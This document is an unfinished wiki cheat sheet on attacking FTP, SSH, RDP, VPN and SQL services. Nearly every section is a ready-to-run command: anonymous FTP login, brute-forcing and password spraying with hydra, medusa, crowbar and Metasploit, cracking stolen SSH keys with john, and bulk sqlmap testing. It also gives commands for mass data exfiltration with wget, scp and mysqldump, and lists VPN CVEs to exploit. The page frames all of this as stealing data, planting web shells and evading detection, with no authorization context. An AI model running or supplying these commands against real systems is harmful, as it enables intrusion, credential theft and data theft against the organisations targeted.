Common Service Attacks

NOTE: This page is under construction

Services

Network services as listed below commonly run standard default ports. Whilst most of your targets (especially internally) may run on default standard ports that you would expect services to run on it's important to look for non-standard, high ports as some sysadmins run their infrastructure under "Security Through Obscurity". To do this we can use third-party services such as Shodan and Censys and port scanners such as nmap.

FTP

File Transfer Protocol (FTP) is commonly used to store and transfer files and runs on port 21 by default. FTP if configured properly cannot be accessed without being vulnerable or using weak credentials. However if the server has misconfigurations (anonymous authentication) and weak credentials are in place then potentially it can be accessed. After which we can login, see if we have write permissions, steal data or upload a web shell to perform further post exploitation and lateral movement.

• FTP Security: https://datatracker.ietf.org/doc/html/rfc2577
• FTP hacking cheat sheet: https://book.hacktricks.xyz/network-services-pentesting/pentesting-ftp

Basic FTP authentication (CLI):

• Basic FTP login: ftp 10.10.10.11 21
• Feature rich (CLI) FTP client: ncftp -u admin -p Password123 10.10.10.11
• A nice feature rich GUI FTP client: https://filezilla-project.org

Anonymous Login

A common security oversight and misconfiguration is an FTP server allowing anonymous login and it becomes even better if we have write permissions! To check for this misconfifration you can either manually try and login with anonymous:anonymous or use the nmap scripting engine to check automatically for you.

Check for FTP anonymous login:

• ftp 10.10.10.11 (anonymous:anonymous)
• sudo nmap -sC -sV 10.10.10.11 -p 21 -oA results

Brute-Force

Brute-Force attacks stuff logins with thousands and hundreds of thousands (even millions) of login attempts using a password word list against a user or a list of users guessing the users password until it finds the right one. If we cant get access to the FTP using the anonymous login method and assuming the sysadmin uses weak and guessable credentials we may be able to brute-force the login and break our way in. Note that this is a very loud and proud method and is not recommended if you're trying to be stealthy.

Brute-force using medusa and rockyou:

• medusa -u admin -P /usr/share/wordlists/rockyou.txt -h 10.10.10.11 -M ftp

FTP Bounce

An FTP Bounce attack is an old attack against FTP where we can effectively use the target (hacked) server as a proxy to access other internal systems on the network externally. We can use this method to port scan an internal network however this is by default not available on modern FTP servers but is still worth checking for just in case your target is vulnerable to this attack.

nmap -Pn -v -n -p 80 -b anonymous:anonymous@10.10.10.11 <internal address>

Exfiltration

Once you find your way into an FTP server which has data that you want to exfiltrate on mass you can use wget to mass exfiltrate all the data from the server to your server.

Exfiltrate all data from the target server:

• wget -m ftp://admin:Password123@10.10.10.11

SSH

Secure shell (SSH) used commonly to remotely login to Linux servers by default runs on port 22, often changed to port 2222 and has root user enabled with password authentication allowed. Most secure SSH servers will use key authentication with the root user disabled for remote authentication and will change the default port to a non-standard port to either try and hide the SSH or reduce the noise that bots make spraying the logins all day.

• SSH Hacking Cheat Sheet: https://book.hacktricks.xyz/network-services-pentesting/pentesting-ssh
• SSH Forward Agent exploitation: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation

Brute-Force

A common attack vector used against SSH is a password based attack where you pump the server logs full of passwords and usernames until a match is found and then we're able to login.

• hydra -u root -P /usr/share/wordlists/rockyou.txt 10.10.10.11 -s 22 ssh

We can also use metasploit (auxiliary/scanner/ssh/ssh_login, scanner/ssh/ssh_enumusers, auxiliary/fuzzers/ssh/ssh_version_2) to perform a brute-force attack against SSH:

msfconsole
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 10.10.10.11
set RPORT 22
set USERNAME root
set PASS_FILE /usr/share/wordlists/password/rockyou.txt
set STOP_ON_SUCCESS true
run

Cracking Keys

Perhaps you have found a local file inclusion (LFI) vulnerability on your targets server and you exploit this not only to retrieve the /etc/passwd file but also to retrieve the servers SSH private key (/home/user/.ssh/id_rsa). However the key is password protected and as such we'll need to crack it in order to be able to use it to remotely authenticate onto the target server.

1. To begin cat the id_rsa file and copy into a local file in order to crack.
2. Create hash: python /usr/share/john/ssh2john.py id_rsa > id_rsa_crackme.txt
3. Crack the hash: john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_crackme.txt
4. Now change the file permissions to chmod 600 id_rsa
5. Now we use the cracked key to ssh into our target! ssh -i id_rsa user@10.10.10.11

Assuming now that you have in fact cracked the ssh private key and are able to use it to authenticate onto the server just enter the key's password once prompted and you'll be able to login successfully.

Exfiltration

To exfiltrate data via SSH unless otherwise through the means of a backdoor is by using secure copy (scp) where we can copy files off the server and onto ours to exfiltrate our targets data.

• scp user@10.10.10.11:/home/ubuntu/super_secret_data.tar.gz ~/Downloads

SMB

RDP

Remote Desktop Protocol (RDP) allows you to control a system remotely as if you were sat at the keyboard physically (with some delay). RDP runs on port 3389 by default, doesn't use multi-factor authentication by default and due to organizations having poor password policies RDP has been a great way to gain initial access into company networks. The added benefit is using a legitimate account already registered on the network and by using windows built in RDP client detection for an intrusion is not as obvious or easy to detect.

• Basic authentication: xfreerdp /u:Administrator /p:Password@123 /v:10.10.10.11:3389
• RDP Hacking Cheat Sheet: https://book.hacktricks.xyz/network-services-pentesting/pentesting-rdp

Enumeration

We can use the nmap scripting engine (NSE) set of RDP scripts to start enumerating RDP to discover more information about our target.

• nmap -sV -p 3389 --script rdp-* 10.10.10.11 -oA results

Password Spray

Assuming your target uses weak and guessable credentials and hasn't implemented multi-factor authentication we can start a brute-force attack against RDP in the hopes of finding an easy way in through poorly implemented authentication.

Note: Be careful to not lockout accounts!

• python crowbar.py -b rdp -s 10.10.10.11/32 -U users.txt -c 'Password@123'

VPN

Virtual Private Networks in the corporate sense (VPNs) are used to connect remotely into the corporations internal network from anywhere outside the network. This allows employees, IT staff, help desk and third parties to connect and access internal resources. We can abuse this trust relationship by either hacking the VPN through common and known vulnerabilities or we can brute-force/password spray looking to find weak and guessable credentials where the accounts don't implement multi-factor authentication.

Vulnerabilities

There are many critical vulnerabilities that affect many different VPNs which we can scan and exploit to gain initial access into your targets network. Here we list some (not all) critical VPN vulnerabilities that are worth scanning for and exploiting.

1. CVE-2018-13379
2. CVE-2019-11510
3. CVE-2019-19781
4. CVE-2019-11539
5. CVE-2020-8260
6. CVE-2021-20016
7. CVE-2022-42475

Brute-Force

For this we can two use metasploit modules for two very common corporate VPNs, one being Fortinet SSL VPN and the other being CISCO.

Cisco

msfconsole
use auxiliary/scanner/http/cisco_ssl_vpn
set RHOSTS 10.10.10.11
set RPORT 443
set USER_FILE users.txt
set PASS_FILE pass.txt
set threads 10
run

Fortinet

msfconsole
use auxiliary/scanner/http/fortinet_ssl_vpn
set RHOSTS 10.10.10.11
set RPORT 10443
set USER_FILE users.txt
set PASS_FILE pass.txt
set threads 10
run

SQL

Databases are frequently used to store and handle data. There's a wide variety of databases out there like MySQL, PostgreSQL, MongoDB, Microsoft SQL Server, SQLite, Oracle, and Redis. These databases fall under different types: Relational, NoSQL, and In-Memory, among others.

Depending on the database type, they run on specific ports. For instance, MySQL on 3306, PostgreSQL on 5432, Microsoft SQL Server on 1433 and 1434, Oracle on 1521, and MongoDB on 27017, just to list a few.

While many older and misconfigured databases allowed for easy access, like using a root user with a blank password, newer versions have plugged these gaps. But it's always worth checking. You can use nmap's NSE scripts to find out more about a database's configuration and vulnerabilities. If you manage to get in, mysqldump can help you extract data. Also, always look out for SQL Injection (SQLi) vulnerabilities in applications connected to these databases."

• Basic authentication: mysql -u root -pPassword@123 -h 10.10.10.11
  • https://github.com/fortra/impacket/blob/master/examples/mssqlclient.py
• Hacking SQL Cheat Sheet: https://book.hacktricks.xyz/network-services-pentesting/pentesting-mysql
  • https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
• Hacking SQL: https://github.com/NetSPI/PowerUpSQL/wiki

Enumeration

We can use the nmap scripting engine (NSE) and it's various scripts to enumerate the targets database either externally or internally and start probing for misconfigurations, vulnerabilities and additional information.

Enumerate using the nmap scripting engine (NSE):

• nmap -Pn -sV -sC -A -p 3306 10.10.10.11 -oA results
• nmap -sV -p 3306 --script mysql-* 10.10.10.11 -oA results
• nmap -sV -p 3306 --script ms-sql-* 10.10.10.11 -oA results

Brute-Force

Databases typically run on localhost and are not externally accessible however some databases may be and if your target has made their database externally accessible then you can try a brute-force attack on the database to see if the password is weak enough to crack.

• nmap -p 5432 --script pgsql-brute 10.10.10.11
• hydra -u root -P /usr/share/wordlists/rockyou.txt 10.10.10.11 -s 3306 mysql

Injection

SQL Injection (SQLi) is a type of attack whereby the targets application has a vulnerable parameter that we can inject SQL code into and start accessing, editing and deleting data from and bypass logins. To quickly test a login page for SQLi bypass you can either try different payloads or capture the login request with an intercept proxy and run sqlmap -r login_test.txt --dbs.

We can use various tools and techniques to discover SQLi such as crawling an application for endpoints and parameters using web crawlers, and then passing that output to sqlmap to start testing parameters for SQLi vulnerabilities (very loud).

• nmap -sV -p 80,443 --script http-sql-injection 10.10.10.11
• Crawl your target: katana -u https://enlacehacktivista.org -o target_params.txt
  • Test for SQLi (bulk): sqlmap -m target_params.txt --batch --answer="redirect=N"

Exfiltration

To exfiltrate the database we can dump the database(s) into a single file to later download off the targets server.

• mysqldump -u root -pPassword@123 --all-databases > db.sql
• PHP database management tool: https://www.adminer.org

SMTP

DNS